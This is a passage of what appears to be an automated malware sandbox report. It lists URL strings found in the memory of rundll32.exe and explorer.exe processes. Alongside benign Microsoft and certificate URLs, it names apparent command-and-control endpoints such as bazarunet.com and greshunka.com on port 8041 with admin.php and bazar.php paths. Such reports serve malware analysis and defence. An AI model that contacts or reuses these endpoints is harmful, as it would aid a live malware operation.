00000017.00000003.2218239826.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2218316136.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731411754.0000029F3BE0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.i.lencr.org/0
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2578798813.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lenc
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731677122.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848849900.0000029F3BE0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1574607542.0000029F3B856000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644516828.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644479966.0000029F3B858000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848954010.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2366245082.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029246377.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2218239826.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2218316136.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731411754.0000029F3BE0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.org0#
Source: explorer.exe, 0000001E.00000000.1578069670.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1578735693.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1576236568.0000000002C60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net
Source: explorer.exe, 0000001E.00000003.2291036902.00000000085E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1578828781.00000000085D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731677122.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848849900.0000029F3BE0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1574607542.0000029F3B856000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2578798813.0000029F3B7E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644516828.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644479966.0000029F3B858000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2366245082.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029246377.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2218239826.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731411754.0000029F3BE0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731677122.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848849900.0000029F3BE0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1574607542.0000029F3B856000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2578798813.0000029F3B7E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644516828.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644479966.0000029F3B858000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2366245082.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029246377.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2218239826.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731411754.0000029F3BE0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: explorer.exe, 0000001E.00000003.2291414903.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BD22000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(
Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSJM
Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSZM
Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSp
Source: explorer.exe, 0000001E.00000000.1578935505.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008796000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/rT
Source: explorer.exe, 0000001E.00000000.1578935505.000000000862F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc
Source: explorer.exe, 0000001E.00000000.1578935505.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008685000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?z$
Source: explorer.exe, 0000001E.00000000.1578935505.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008796000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/~T
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2579681350.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000001E.00000000.1578935505.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008685000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2367085005.0000029F3B82E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com/
Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2372533125.0000029F3BE20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/
Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/%
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2367085005.0000029F3B82E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/admin.php
Source: rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/admin.php1
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2367085005.0000029F3B82E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/admin.php=
Source: rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/admin.phpN
Source: rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/bazar.php
Source: rundll32.exe, 00000017.00000003.2372533125.0000029F3BE20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/bazar.php1
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2367085005.0000029F3B82E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/bazar.php;
Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/bazar.phpV
Source: rundll32.exe, 00000017.00000003.2367085005.0000029F3B82E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/bazar.phpm
Source: rundll32.exe, 00000017.00000003.2372533125.0000029F3BE20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/net.com:8041/bazar.php
Source: rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/p
Source: explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
Source: explorer.exe, 0000001E.00000000.1578935505.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.00000000087C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com/vi
Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com/~i
Source: rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/)
Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/0
Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/E
Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/M
Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/admin.php
Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/admin.php1
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2367085005.0000029F3B82E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/admin.phpQ
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/admin.phpad
Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/admin.phpn
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/admin.phpo
Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2372533125.0000029F3BE20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/bazar.php
Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/bazar.php.
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/bazar.phpad
Source: rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/bazar.phpy
Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/net.com:8041/0
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
Source: explorer.exe, 0000001E.00000002.2591885032.000000000BEC0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/
Source: explorer.exe, 0000001E.00000002.2591885032.000000000BEC0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/a
